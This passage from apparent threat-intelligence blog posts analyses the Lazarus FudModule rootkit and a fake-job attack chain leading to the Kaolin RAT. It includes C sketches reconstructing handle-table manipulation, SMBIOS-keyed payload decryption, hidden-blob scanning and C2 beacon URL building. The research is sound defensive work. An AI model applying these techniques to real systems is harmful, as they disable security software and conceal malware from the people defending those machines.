As the kernel internally manages image verification callbacks in a similar fashion to some of the other callbacks we already explored, the rootkit’s removal implementation will undoubtedly seem familiar. First, the rootkit resolves the nt!SeRegisterImageVerificationCallback routine and scans its body to locate nt!ExCbSeImageVerificationDriverInfo. Dereferencing this, it obtains a pointer to a _CALLBACK_OBJECT structure, which holds the callbacks in the _CALLBACK_OBJECT.RegisteredCallbacks linked list. This list consists of _CALLBACK_REGISTRATION structures, where the actual callback function pointer can be found in _CALLBACK_REGISTRATION.CallbackFunction. FudModule clears the entire list by making the RegisteredCallbacks head LIST_ENTRY point directly to itself. Additionally, it also walks the original linked list and similarly short-circuits each individual _CALLBACK_REGISTRATION entry in the list. 

This rootkit technique is newly implemented in the current version of FudModule, and we can only speculate on the motivation here. It seems to be designed to help avoid detection when loading either a vulnerable or a malicious driver. However, it might be hard to understand why Lazarus should want to load an additional driver if they already have control over the kernel. It would make little sense for them to load a vulnerable driver, as they already established their kernel read/write primitive by exploiting a zero-day in a preinstalled Windows driver. Further, even if they were exploiting a vulnerable driver in the first place (as was the case in the previous version of FudModule), it would be simply too late to unlink the callback now. By the time this rootkit technique executes, the image verification callback for the vulnerable driver would have already been invoked. Therefore, we believe the most likely explanation is that the threat actors are preparing the grounds for loading some malicious driver later. Perhaps the idea is that they just want to be covered in case they decide to deploy some additional kernel-mode payload in the future. 

0x200 – Direct Attacks on Security Software 

The rootkit techniques we explored up to this point were all somewhat generic. Each targeted some security-related system component and, through it, indirectly interfered with all security software that relied on the component. In contrast, this final technique goes straight to the point and aims to directly disable specific security software. In particular, the targeted security solutions are AhnLab V3 Endpoint Security, Windows Defender, CrowdStrike Falcon, and HitmanPro. 

The attack starts with the rootkit obtaining the address of its own _EPROCESS structure. This is done using NtDuplicateHandle to duplicate the current process pseudohandle and then calling NtQuerySystemInformation to get SystemExtendedHandleInformation. With the extended handle information, the rootkit looks for an entry corresponding to the duplicated handle and obtains the _EPROCESS pointer from there. Using NtQuerySystemInformation to leak kernel pointers is a well-known technique that Microsoft aims to restrict by gradually building up mitigations. However, attackers capable of enabling SeDebugPrivilege at high integrity levels are out of scope of these mitigations, so FudModule can keep using this technique, even on the upcoming 24H2 builds. With the _EPROCESS pointer, FudModule disables mitigations by zeroing out _EPROCESS.MitigationFlags. Then, it also clears the EnableHandleExceptions flag from _EPROCESS.ObjectTable.Flags. We believe this is meant to increase stability in case something goes wrong later during the handle table entry manipulation technique that we will describe shortly.  

Regarding the specific technique used to attack the security solutions, AhnLab is handled differently than the other three targets. FudModule first checks if AhnLab is even running, by traversing the ActiveProcessLinks linked list and looking for a process named asdsvc.exe (AhnLab Smart Defense Service) with _EPROCESS.Token.AuthenticationId set to SYSTEM_LUID. If such a process is found, FudModule clears its _EPROCESS.Protection byte, effectively toggling off PPL protection for the process. While this asdsvc.exe process is under usual circumstances meant to be protected at the standard PsProtectedSignerAntimalware level, this modification makes it just a regular non-protected process. This opens it up to further attacks from user mode, where now even other privileged, yet non-protected processes could be able to tamper with it. However, we suspect the main idea behind this technique might be to disrupt the link between AhnLab’s user-mode and kernel-mode components. By removing the service’s PPL protection, the kernel-mode component might no longer recognize it as a legitimate AhnLab component. However, this is just a speculation as we didn’t test the real impact of this technique. 

Handle Table Entry Manipulation 

The technique employed to attack Defender, CrowdStrike, and HitmanPro is much more intriguing: FudModule attempts to suspend them using a new handle table entry manipulation technique. To better understand this technique, let’s begin with a brief background on handle tables. When user-mode code interacts with kernel objects such as processes, files, or mutexes, it typically doesn’t work with the objects directly. Instead, it references them indirectly through handles. Internally, the kernel must be able to translate the handle to the corresponding object, and this is where the handle table comes in. This per-process table, available at _EPROCESS.ObjectTable.TableCode, serves as a mapping from handles to the underlying objects. Organized as an array, it is indexed by the integer value of the handle. Each element is of type _HANDLE_TABLE_ENTRY and contains two crucial pieces of information: a (compressed) pointer to the object’s header (nt!_OBJECT_HEADER) and access bits associated with the handle. 
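
For orientation, translating a handle value into the address of its _HANDLE_TABLE_ENTRY can be sketched as follows in C, under the simplifying assumption of a single-level handle table: the low bits of TableCode encode the table level, each x64 entry is 16 bytes, and handle values advance in steps of 4. Multi-level tables, used once a process owns many handles, are ignored here for brevity, and the bit layout is taken from public research rather than from the rootkit.

// Compute the kernel address of a _HANDLE_TABLE_ENTRY for a given handle value,
// assuming a level-0 (single-level) handle table.
#include <stdint.h>

#define HANDLE_TABLE_ENTRY_SIZE 0x10  // x64: packed object pointer + granted access bits

static uint64_t HandleTableEntryAddress(uint64_t tableCode, uint32_t handleValue) {
    uint64_t level = tableCode & 3;          // table level stored in the low bits
    uint64_t table = tableCode & ~3ULL;      // pointer to the level-0 entry array
    if (level != 0) return 0;                // multi-level lookup not handled in this sketch
    return table + ((uint64_t)(handleValue >> 2)) * HANDLE_TABLE_ENTRY_SIZE;
}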

Due to this handle design, kernel object access checks are typically split into two separate logical steps. The first step happens when a process attempts to acquire a handle (such as opening a file with CreateFile). During this step, the current thread’s token is typically checked against the target object’s security descriptor to ensure that the thread is allowed to obtain a handle with the desired access mask. The second check takes place when a process performs an operation using an already acquired handle (such as writing to a file with WriteFile). This typically only involves verifying that the handle is powerful enough (meaning it has the right access bits) for the requested operation.  

FudModule executes as a non-protected process, so it theoretically shouldn’t be able to obtain a powerful handle to a PPL-protected process such as the CrowdStrike Falcon Service. However, leveraging the kernel read/write primitive, FudModule has the ability to access the handle table directly. This allows it to craft a custom handle table entry with control over both the referenced object and the access bits. This way, it can conjure an arbitrary handle to any object, completely bypassing the check typically needed for handle acquisition. What’s more, if it sets the handle’s access bits appropriately, it will also satisfy the subsequent handle checks when performing its desired operations. 

To prepare for the handle table entry manipulation technique, FudModule creates a dummy thread that just puts itself to sleep immediately. The thread itself is not important. What is important is that by calling CreateThread, the rootkit just obtained a thread handle with THREAD_ALL_ACCESS rights. This handle is the one that will have its handle table entry manipulated. Since it already has very powerful access bits, the rootkit will not even have to touch its _HANDLE_TABLE_ENTRY.GrantedAccessBits. All it needs to do is overwrite _HANDLE_TABLE_ENTRY.ObjectPointerBits to redirect the handle to an arbitrary object of its choice. This will make the handle reference that object and enable the rootkit to perform privileged operations on it. Note that ObjectPointerBits is not the whole pointer to the object: it only represents 44 bits of the 64-bit pointer. But since the _OBJECT_HEADER pointed to by ObjectPointerBits is guaranteed to be aligned (meaning the least significant four bits must be zero) and in kernel address space (meaning the most significant sixteen bits must be 0xFFFF), the remaining 20 bits can be easily inferred. 
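
The pointer compression described above can be expressed as a pair of small helpers, as in the C sketch below; the 44-bit width, the 16-byte alignment shift, and the 0xFFFF prefix follow directly from the text.

// Convert between a full _OBJECT_HEADER kernel address and the 44-bit ObjectPointerBits
// field stored in _HANDLE_TABLE_ENTRY.
#include <stdint.h>

static uint64_t ObjectPointerBitsToHeader(uint64_t objectPointerBits) {
    // Headers are 16-byte aligned and live in kernel space, so shift left by 4 and
    // prepend the canonical kernel prefix.
    return 0xFFFF000000000000ULL | (objectPointerBits << 4);
}

static uint64_t HeaderToObjectPointerBits(uint64_t objectHeaderAddress) {
    // Inverse operation, needed when overwriting the entry to redirect a handle.
    return (objectHeaderAddress >> 4) & ((1ULL << 44) - 1);
}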

A dummy thread whose handle will be the subject of handle table entry manipulation. 

The specific processes targeted by this technique are MsSense.exe, MsMpEng.exe, CSFalconService.exe, and hmpalert.exe. FudModule first finds their respective _EPROCESS structures, employing the same algorithm as it did to find the AhnLab service. Then, it performs a sanity check to ensure that the dummy thread handle is not too high by comparing it with _EPROCESS.ObjectTable.NextHandleNeedingPool (which holds information on the maximum possible handle value given the current handle table allocation size). With the sanity check satisfied, FudModule accesses the handle table itself (_EPROCESS.ObjectTable.TableCode) and modifies the dummy thread’s _HANDLE_TABLE_ENTRY so that it points to the _OBJECT_HEADER of the target _EPROCESS. Finally, the rootkit uses the redirected handle to call NtSuspendProcess, which will suspend the targeted process.  

It might seem odd that the manipulated handle used to be a thread handle, but now it’s being used as a process handle. In practice, there is nothing wrong with this since the handle table itself holds no object type information. The object type is stored in _OBJECT_HEADER.TypeIndex so when the rootkit redirected the handle, it also effectively changed the handle object type. As for the access bits, the original THREAD_ALL_ACCESS gets reinterpreted in the new context as PROCESS_ALL_ACCESS since both constants share the same underlying value. 

The manipulated dummy thread handle (0x168), now referencing a process object. 

Though suspending the target process might initially appear to be a completed job, FudModule doesn’t stop here. After sleeping for five seconds, it also attempts to iterate over all the threads in the target process, suspending them one by one. When all threads are suspended, FudModule uses NtResumeProcess to resume the suspended process. At this point, while the process itself is technically resumed, its individual threads remain suspended, meaning the process is still effectively in a suspended state. We can only speculate why Lazarus implemented process suspension this way, but it seems like an attempt to make the technique stealthier. After all, a suspended process is much more conspicuous than just several threads with increased suspend counts. 

To enumerate threads, FudModule calls NtQuerySystemInformation with the SystemExtendedHandleInformation class. Iterating over the returned handle information, FudModule searches for thread handles from the target process. The owner process is checked by comparing the PID of the target process with SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.UniqueProcessId and the type is checked by comparing SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.ObjectTypeIndex with the thread type index, which was previously obtained using NtQueryObject to get ObjectTypesInformation. For each enumerated thread (which might include some threads multiple times, as there might be more than one open handle to the same thread), FudModule manipulates the dummy thread handle so that it points to the enumerated thread and suspends it by calling SuspendThread on the manipulated handle. Finally, after all threads are suspended and the process resumed, FudModule restores the manipulated handle to its original state, once again referencing the dummy sleep thread. 

Conclusion 

The Lazarus Group remains among the most prolific and long-standing advanced persistent threat actors. Though their signature tactics and techniques are well-recognized by now, they still occasionally manage to surprise us with an unexpected level of technical sophistication. The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal. Recent updates examined in this blog show Lazarus’ commitment to keep actively developing this rootkit, focusing on improvements in both stealth and functionality. 

With their admin-to-kernel zero-day now burned, Lazarus is confronted with a significant challenge. They can either discover a new zero-day exploit or revert to their old BYOVD techniques. Regardless of their choice, we will continue closely monitoring their activity, eager to see how they will cope with these new circumstances. 

Indicators of Compromise (IoCs) 

A YARA rule for the latest FudModule variant is available at https://github.com/avast/ioc/tree/master/FudModule#yara.

The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams

18 April 2024 at 06:30

Key Points

  • Avast discovered a new campaign targeting specific individuals through fabricated job offers. 
  • Avast uncovered the full attack chain, from the infection vector to the deployment of the “FudModule 2.0” rootkit via a 0-day admin-to-kernel exploit. 
  • Avast found a previously undocumented Kaolin RAT which, aside from standard RAT functionality, could change the last write timestamp of a selected file and load any DLL binary received from the C&C server. We also believe it was responsible for loading FudModule along with the 0-day exploit. 

Introduction

In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. The group’s sophistication is evident from previous research, where Lazarus exploited vulnerable drivers and performed several rootkit techniques to effectively blind security products and achieve better persistence. 

In this instance, Lazarus sought to blind security products by exploiting a vulnerability in the default Windows driver, appid.sys (CVE-2024-21338). More information about this vulnerability can be found in a corresponding blog post

This indicates that Lazarus likely allocated additional resources to develop such attacks. Prior to exploitation, Lazarus deployed the toolset meticulously, employing fileless malware and encrypting the arsenal onto the hard drive, as detailed later in this blog post. 

Furthermore, the nature of the attack suggests that the victim was carefully selected and highly targeted, as there likely needed to be some level of rapport established with the victim before executing the initial binary. Deploying such a sophisticated toolset alongside the exploit indicates considerable resourcefulness. 

This blog post will present a technical analysis of each module within the entire attack chain. This analysis aims to establish connections between the toolset arsenal used by the Lazarus group and previously published research. 

Initial access 

The attacker initiates the attack by presenting a fabricated job offer to an unsuspecting individual, utilizing social engineering techniques to establish contact and build rapport. While the specific communication platform remains unknown, previous research by Mandiant and ESET suggests potential delivery vectors may include LinkedIn, WhatsApp, email or other platforms. Subsequently, the attacker attempts to send a malicious ISO file, disguised as a VNC tool, as part of the interviewing process. ISO files have become very attractive to attackers because, starting with Windows 10, an ISO file can be mounted automatically just by double-clicking it, with the operating system making the ISO contents easily accessible. This may also serve as a potential Mark-of-the-Web (MotW) bypass. 

Having established rapport, the attacker tricks the victim into mounting the ISO file, which contains three files: AmazonVNC.exe, version.dll and aws.cfg. The victim is then led to execute AmazonVNC.exe.  

The AmazonVNC.exe executable only pretends to be an Amazon VNC client; in reality, it is a legitimate Windows application called choice.exe that ordinarily resides in the System32 folder. It is used for sideloading: the legitimate choice.exe application ends up loading the malicious version.dll. Sideloading is a popular technique among attackers for evading detection since the malicious DLL is executed in the context of a legitimate application.  

When AmazonVNC.exe gets executed, it loads version.dll. This malicious DLL uses native Windows API functions in an attempt to avoid defensive techniques such as user-mode API hooks, invoking all native API functions through direct syscalls. The malicious functionality is implemented in one of the exported functions rather than in DllMain: DllMain contains no real code and simply returns 1, while the other exported functions contain nothing but Sleep calls. 

After the DLL obtains the correct syscall numbers for the current Windows version, it is ready to spawn an iexpress.exe process to host a further malicious payload that resides in the third file, aws.cfg. Injection is performed only if Kaspersky antivirus is installed on the victim’s computer, which seems to be done to evade Kaspersky’s detection; if Kaspersky is not installed, the malware executes the payload by creating a thread in the current process, with no injection. The aws.cfg file, which is the next-stage payload, is obfuscated with VMProtect, perhaps in an effort to make reverse engineering more difficult. The payload is capable of downloading shellcode from a Command and Control (C&C) server, which we believe is a legitimate but compromised website selling marble material for construction. The official website is https://www[.]henraux.com/, and the attacker was able to download shellcode from https://www[.]henraux.com/sitemaps/about/about.asp. 

In detailing our findings, we faced challenges extracting the shellcode from the C&C server, as the malicious URL was unresponsive.  

By analyzing our telemetry, we uncovered potential threats at one of our clients, indicating a significant correlation between shellcode being loaded from the C&C server via the ISO file and the subsequent appearance of RollFling, a new, previously undocumented loader that we discovered and will delve into later in this blog post. 

Moreover, the delivery method of the ISO file exhibits tactical similarities to those employed by the Lazarus group, a fact previously noted by researchers from Mandiant and ESET

In addition, a RollSling sample was identified on the victim machines, displaying code similarities with the RollSling sample discussed in Microsoft’s research. Notably, the RollSling instance discovered in our client’s environment was delivered by the RollFling loader, confirming our belief in the connection between the absent shellcode and the initial RollFling loader. For visual confirmation, refer to the first screenshot below, which shows the RollSling code from the sample referenced in Microsoft’s report, while the second screenshot shows the code derived from our RollSling sample. 

Image illustrating the RollSling code identified by Microsoft. SHA: d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca.
Image showcasing the RollSling code discovered within our target. SHA: 68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f.

In the next paragraphs, we are going to explain every component in the execution chain, starting with the initial RollFling loader, continuing with the subsequently loaded RollSling loader, and then the final RollMid loader. Finally, we will analyze the Kaolin RAT, which is ultimately loaded by the chain of these three loaders. 

Loaders

RollFling

The RollFling loader is a malicious DLL registered as a service, indicating the attacker’s initial attempt at achieving persistence. Accompanying the RollFling loader are essential files crucial for the consistent execution of the attack chain. Its primary role is to kickstart the execution chain, where all subsequent stages operate exclusively in memory. Unfortunately, we were unable to ascertain whether the DLL file was installed as a service with administrator rights or just with standard user rights. 

The loader acquires the System Management BIOS (SMBIOS) table by utilizing the Windows API function GetSystemFirmwareTable. Beginning with Windows 10, version 1803, any user mode application can access SMBIOS information. SMBIOS serves as the primary standard for delivering management information through system firmware. 

By calling the GetSystemFirmwareTable function (see Figure 1), the loader retrieves the SMBIOS table data, which it then uses as a key to decrypt the encrypted RollSling loader with a XOR operation. Without the correct SMBIOS table data, which serves as a 32-byte-long key, the decryption would produce garbage and execution of the malware would not proceed to the next stage. This suggests a highly targeted attack aimed at a specific individual. 
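
A simplified C sketch of this step is shown below, assuming the raw SMBIOS table is obtained through GetSystemFirmwareTable with the 'RSMB' provider and that the key is applied as a repeating XOR over the encrypted RollSling image. Which 32 bytes of the table actually form the key is an assumption for illustration.

// Retrieve the raw SMBIOS table and use (part of) it as a repeating XOR key.
#include <windows.h>
#include <stdlib.h>

static BYTE *GetSmbiosTable(DWORD *outSize) {
    // 'RSMB' identifies the raw SMBIOS firmware table provider.
    DWORD size = GetSystemFirmwareTable('RSMB', 0, NULL, 0);
    if (size == 0) return NULL;
    BYTE *buffer = (BYTE *)malloc(size);
    if (!buffer) return NULL;
    *outSize = GetSystemFirmwareTable('RSMB', 0, buffer, size);
    return buffer;
}

// Repeating-key XOR over the encrypted payload (keyLen would be 32 in this scenario).
static void XorDecrypt(BYTE *data, SIZE_T dataLen, const BYTE *key, SIZE_T keyLen) {
    for (SIZE_T i = 0; i < dataLen; i++)
        data[i] ^= key[i % keyLen];
}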

This suggests that, prior to establishing persistence by registering the RollFling loader as a service, the attacker had to gather the SMBIOS table information and transmit it to the C&C server, so that the C&C server could reply with another stage. This additional stage, called RollSling, is stored in the same folder as RollFling but with the ".nls" extension.  

After successful XOR decryption, RollFling loads the decrypted RollSling into memory and hands execution over to it. 

Figure 1: Obtaining SMBIOS firmware table provider

RollSling

The RollSling loader, initiated by RollFling, is executed in memory. This choice may help the attacker evade detection by security software. The primary function of RollSling is to locate a binary blob situated in the same folder as RollSling; if the binary blob is not found there, the loader looks in the Package Cache folder instead. This binary blob holds various stages and configuration data essential for the malicious functionality, and it must have been uploaded to the victim machine by some previous stage in the infection chain.  

The reasoning behind the binary blob holding multiple files and configuration values is twofold. Firstly, it is more efficient to keep all the information in a single file; secondly, most of the binary blob can be encrypted, which adds another layer of evasion and lowers the chance of detection.  

RollSling scans the current folder looking for the specific binary blob. To determine which file in the folder is the right one, it first reads 4 bytes to determine the size of the data to read. Once the data is read, the bytes from the binary blob are reversed and saved in a temporary variable; the candidate then goes through several checks, such as the MZ header check. If the MZ header check passes, the loader subsequently looks for the “StartAction” export function in the extracted binary. If all conditions are met, the next stage, RollMid, is loaded into memory. Notably, the attackers did not rely on any specific file name or extension to easily find the binary blob in the folder; instead, they identify the right binary blob through the several conditions it has to meet. This is also a defense evasion technique, making it harder for defenders to find the binary blob on the infected machine. A rough sketch of such a scan is shown below. 
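The following sketch illustrates the described selection logic. It is our reconstruction, not the malware’s code: ReadFileToBuffer and FindExportByName are hypothetical helpers standing in for file reading and PE export-table parsing.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Hypothetical helpers (not Windows APIs): read a file into memory and walk a
// PE export table looking for a named export.
BYTE *ReadFileToBuffer(const char *folder, const char *name, DWORD *size);
void *FindExportByName(const BYTE *image, const char *exportName);

// Sketch: accept the first file whose reversed, length-prefixed content is a PE
// exporting "StartAction".
BYTE *FindBinaryBlob(const char *folder, DWORD *outSize)
{
    char pattern[MAX_PATH];
    WIN32_FIND_DATAA fd;
    BYTE *result = NULL;

    snprintf(pattern, sizeof(pattern), "%s\\*", folder);
    HANDLE h = FindFirstFileA(pattern, &fd);
    if (h == INVALID_HANDLE_VALUE)
        return NULL;

    do {
        if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            continue;

        DWORD total = 0;
        BYTE *raw = ReadFileToBuffer(folder, fd.cFileName, &total);
        if (raw == NULL)
            continue;

        DWORD size = (total >= 4) ? *(DWORD *)raw : 0;           // 4-byte length prefix
        if (size >= 2 && size <= total - 4) {
            BYTE *candidate = (BYTE *)malloc(size);
            for (DWORD i = 0; i < size; i++)
                candidate[i] = raw[4 + size - 1 - i];             // reverse the byte order

            if (candidate[0] == 'M' && candidate[1] == 'Z' &&     // MZ header check
                FindExportByName(candidate, "StartAction"))       // "StartAction" export check
            {
                result = candidate;
                *outSize = size;
            } else {
                free(candidate);
            }
        }
        free(raw);
    } while (result == NULL && FindNextFileA(h, &fd));

    FindClose(h);
    return result;
}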

The extracted binary represents the next stage in the execution chain: the third loader, called RollMid, which is likewise executed in the computer’s memory. 

Before the execution of the RollMid loader, the malware creates two folders, named in the following way: 

  • %driveLetter%:\\ProgramData\\Package Cache\\[0-9A-Z]{8}-DF09-AA86-YI78-[0-9A-Z]{12}\\ 
  • %driveLetter%:\\ProgramData\\Package Cache\\ [0-9A-Z]{8}-09C7-886E-II7F-[0-9A-Z]{12}\\ 

These folders serve as destinations for moving the binary blob, now renamed with a newly generated name and a ".cab" extension. The RollSling loader stores the binary blob in the first created folder and stores a new temporary file, whose usage will be mentioned later, in the second created folder.  

The attacker utilizes the "Package Cache" folder, a common repository for software installation files, to better hide its malicious files in a folder full of legitimate files. In this approach, the attacker also leverages the ".cab" extension, which is the usual extension for the files located in the Package Cache folder. By employing this method, the attacker is trying to effectively avoid detection by relocating essential files to a trusted folder. 

In the end, the RollSling loader calls an exported function called "StartAction". This function is called with specific arguments, including information about the actual path of the RollFling loader, the path where the binary blob resides, and the path of a temporary file to be created by the RollMid loader. 

Figure 2: Looking for a binary blob in the same folder as the RollFling loader

RollMid

The responsibility of the RollMid loader lies in loading key components of the attack and configuration data from the binary blob, while also establishing communication with a C&C server. 

The binary blob, containing essential components and configuration data, serves as a critical element in the proper execution of the attack chain. Unfortunately, our attempts to obtain this binary blob were unsuccessful, leading to gaps in our full understanding of the attack. However, we were able to retrieve the RollMid loader and certain binaries stored in memory. 

Within the binary blob, the RollMid loader is a fundamental component located at the beginning (see Figure 3). The first 4 bytes in the binary blob describe the size of the RollMid loader. There are two more binaries stored in the binary blob after the RollMid loader as well as configuration data, which is located at the very end of the binary blob. These two other binaries and configuration data are additionally subject to compression and AES encryption, adding layers of security to the stored information.  

As depicted, the first four bytes enclosed in the initial yellow box describe the size of the RollMid loader. This specific information is also important for parsing, enabling the transition to the subsequent section within the binary blob. 

Located after the RollMid loader, there are two 4-byte values, distinguished by yellow and green colors. The former corresponds to the size of the FIRST_ENCRYPTED_DLL section, while the latter (green box) signifies the size of the SECOND_ENCRYPTED_DLL section. Notably, the second 4-byte value in the green box serves a dual purpose: besides describing a size, it also constitutes part of the 16-byte AES key for decrypting the FIRST_ENCRYPTED_DLL section. Thanks to the provided information on the sizes of each encrypted DLL embedded in the binary blob, we are now equipped to access the configuration data section placed at the end of the binary blob. 

Figure 3: Structure of the Binary blob 
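The layout shown in Figure 3 can be summarized with the following parsing sketch. Field and structure names are ours, the exact ordering of the two encrypted DLL sections follows our reading of the described structure, and bounds checks are omitted for brevity.

#include <stdint.h>
#include <string.h>

// Conceptual view of the binary blob (names are ours, not the malware's).
typedef struct {
    const uint8_t *rollMid;        uint32_t rollMidSize;
    const uint8_t *firstEncDll;    uint32_t firstEncDllSize;
    const uint8_t *secondEncDll;   uint32_t secondEncDllSize;
    const uint8_t *configData;     uint32_t configDataSize;
} BlobLayout;

void ParseBlob(const uint8_t *blob, uint32_t blobSize, BlobLayout *out)
{
    uint32_t off = 0;

    memcpy(&out->rollMidSize, blob + off, 4); off += 4;          // size of the RollMid loader
    out->rollMid = blob + off;                off += out->rollMidSize;

    memcpy(&out->firstEncDllSize,  blob + off, 4); off += 4;     // size of FIRST_ENCRYPTED_DLL
    memcpy(&out->secondEncDllSize, blob + off, 4); off += 4;     // size of SECOND_ENCRYPTED_DLL
                                                                 // (also reused as part of the AES key)
    out->firstEncDll  = blob + off; off += out->firstEncDllSize;
    out->secondEncDll = blob + off; off += out->secondEncDllSize;

    out->configData     = blob + off;                            // configuration data sits at the end
    out->configDataSize = blobSize - off;
}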

The RollMid loader requires the FIRST_DLL_BINARY for proper communication with the C&C server. However, before loading FIRST_DLL_BINARY, the RollMid loader must first decrypt the FIRST_ENCRYPTED_DLL section. 

The decryption process applies the AES algorithm, beginning with the parsing of the decryption key alongside an initialization vector to use for AES decryption. Subsequently, a decompression algorithm is applied to further extract the decrypted content. Following this, the decrypted FIRST_DLL_BINARY is loaded into memory, and the DllMain function is invoked to initialize the networking library. 

Unfortunately, as we were unable to obtain the binary blob, we didn’t get a chance to reverse engineer the FIRST_DLL_BINARY. This presents a limitation in our understanding, as the precise implementation details for the imported functions in the RollMid loader remain unknown. These imported functions include the following: 

  • SendDataFromUrl 
  • GetImageFromUrl 
  • GetHtmlFromUrl 
  • curl_global_cleanup 
  • curl_global_init 

After reviewing the exported functions by their names, it becomes apparent that these functions are likely tasked with facilitating communication with the C&C server. FIRST_DLL_BINARY also exports other functions beyond these five, some of which will be mentioned later in this blog.  

The names of these five imported functions imply that FIRST_DLL_BINARY is built upon the curl library (as can be seen by the names curl_global_cleanup and curl_global_init). In order to establish communication with the C&C servers, the RollMid loader employs the imported functions, utilizing HTTP requests as its preferred method of communication. 

The rationale behind opting for the curl library for sending HTTP requests may stem from various factors. One notable reason could be the efficiency gained by the attacker, who can save time and resources by leveraging the HTTP communication protocol. Additionally, the ease of use and seamless integration of the curl library into the code further support its selection. 

Prior to initiating communication with the C&C server, the malware generates a dictionary filled with random words, as illustrated in Figure 4 below. Given the extensive size of the dictionary (several hundred elements), we have included only a partial screenshot for reference. The subsequent sections of this blog delve into the role and application of this dictionary in the overall functionality of the malware. 

Figure 4: Filling the main dictionary 

To establish communication with the C&C server, as illustrated in Figure 5, the malware must obtain the initial C&C addresses from the CONFIGURATION_DATA section. Upon decrypting these addresses, the malware initiates communication with the first layer of the C&C server through the GetHtmlFromUrl function, presumably using an HTTP GET request. The server responds with an HTML file containing the address of the second C&C server layer. Subsequently, the malware engages in communication with the second layer, employing the imported GetImageFromUrl function. The function name implies this performs a GET request to retrieve an image. 

In this scenario, the attackers employ steganography to conceal crucial data for use in the next execution phase. Regrettably, we were unable to ascertain the nature of the important data concealed within the image received from the second layer of the C&C server. 

Figure 5: Communication with C&C servers 

We are aware that the concealed data within the image serves as a parameter for a function responsible for transmitting data to the third C&C server. Through our analysis, we have determined that the acquired data from the image corresponds to another address of the third C&C server.  Communication with the third C&C server is initiated with a POST request.  

Malware authors strategically employ multiple C&C servers as part of their operational tactics to achieve specific objectives. In this case, the primary goal is to obtain an additional data blob from the third C&C server, as depicted in Figure 5, specifically in step 7. Furthermore, the use of different C&C servers and diverse communication pathways adds an additional layer of complexity for security tools attempting to monitor such activities. This complexity makes tracking and identifying malicious activities more challenging, as compared to scenarios where a single C&C server is employed.

The malware then constructs a URL by creating a query string with GET parameters (name/value pairs). The parameter name is a randomly selected word from the previously created dictionary and the value is a randomly generated string of two characters. The format is as follows: 

"%addressOfThirdC&C%?%RandomWordFromDictonary%=%RandomString%" 

The URL generation involves the selection of words from a generated dictionary, as opposed to entirely random strings. This deliberate choice aims to enhance the appearance and legitimacy of the URL. The words, carefully curated from the dictionary, contribute to a clean and organized URL, resembling those commonly associated with authentic applications. Terms such as "atype", "User", or "type" are not arbitrary but rather thoughtfully chosen words from the created dictionary. By utilizing real words, the intention is to create a semblance of authenticity, making the HTTP POST payload appear more structured and in line with typical application interactions.  
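A minimal sketch of how such a URL could be assembled follows. Only the format itself comes from the sample; the dictionary contents and the two-character value generator are our placeholders.

#include <stdio.h>
#include <stdlib.h>

// Sketch: build "%addressOfThirdC&C%?%RandomWordFromDictonary%=%RandomString%".
// 'dictionary' stands in for the word list the malware generates at runtime.
void BuildBeaconUrl(char *out, size_t outSize, const char *c2Address,
                    const char **dictionary, size_t dictSize)
{
    const char *word = dictionary[rand() % dictSize];        // random word from the dictionary

    char value[3];                                            // two random lowercase characters
    value[0] = (char)('a' + rand() % 26);
    value[1] = (char)('a' + rand() % 26);
    value[2] = '\0';

    snprintf(out, outSize, "%s?%s=%s", c2Address, word, value);
}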

Before dispatching the POST request to the third layer of the C&C server, the request is populated with additional key-value tuples separated by standard delimiters “?” and “=” between the key and value. In this scenario, it includes: 

%RandomWordFromDictonary%=%sleep_state_in_minutes%?%size_of_configuration_data%  

The data received from the third C&C server is parsed. The parsed data may contain either an integer describing a sleep interval or a data blob encoded with the base64 algorithm. After decoding, the first 4 bytes indicate the size of the first part of the data blob, and the remainder represents the second part. 

The first part of the data blob is appended as an overlay to the SECOND_ENCRYPTED_DLL obtained from the binary blob. After successfully decrypting and decompressing SECOND_ENCRYPTED_DLL, which is a Remote Access Trojan (RAT) component, the malware prepares it to be loaded into memory and executed with specific parameters. 

The underlying motivation behind this maneuver remains shrouded in uncertainty. It appears that the attacker, by choosing this method, sought to inject a degree of sophistication or complexity into the process. However, from our perspective, this approach seems to border on overkill. We believe that a simpler method could have sufficed for passing the data blob to the Kaolin RAT.  

The second part of the data blob, once decrypted and decompressed, is handed over to the Kaolin RAT component, while the Kaolin RAT is executed in memory. Notably, the decryption key and initialization vector for decrypting the second part of the data blob reside within its initial 32 bytes.  

Kaolin RAT

A pivotal phase in orchestrating the attack involves the utilization of a Remote Access Trojan (RAT). As mentioned earlier, this Kaolin RAT is executed in memory and configured with specific parameters for proper functionality. It stands as a fully equipped tool, including file compression capabilities.  

However, in our investigation, the Kaolin RAT does not mark the conclusion of the attack. In the previous blog post, we already introduced another significant component – the FudModule rootkit. Thanks to our robust telemetry, we can confidently assert that this rootkit was loaded by the aforementioned Kaolin RAT, showcasing its capabilities to seamlessly integrate and deploy FudModule. This layered progression underscores the complexity and sophistication of the overall attack strategy. 

One of the important steps is establishing secure communication with the RAT’s C&C server, encrypted using the AES encryption algorithm. Despite the unavailability of the binary containing the communication functionalities (the RAT also relies on functions imported from FIRST_DLL_BINARY for networking), our understanding is informed by other components in the attack chain, allowing us to make certain assumptions about the communication method. 

The Kaolin RAT is loaded with six arguments, among which a key one is the base address of the network module DLL binary, previously also used in the RollMid loader. Another argument includes the configuration data from the second part of the received data blob. 

For proper execution, the Kaolin RAT needs to parse this configuration data, which includes parameters such as: 

  • Duration of the sleep interval. 
  • A flag indicating whether to collect information about available disk drives. 
  • A flag indicating whether to retrieve a list of active sessions on the remote desktop. 
  • Addresses of additional C&C servers. 

In addition, the Kaolin RAT must load specific functions from FIRST_DLL_BINARY, namely: 

  • SendDataFromURL 
  • ZipFolder 
  • UnzipStr 
  • curl_global_cleanup 
  • curl_global_init 

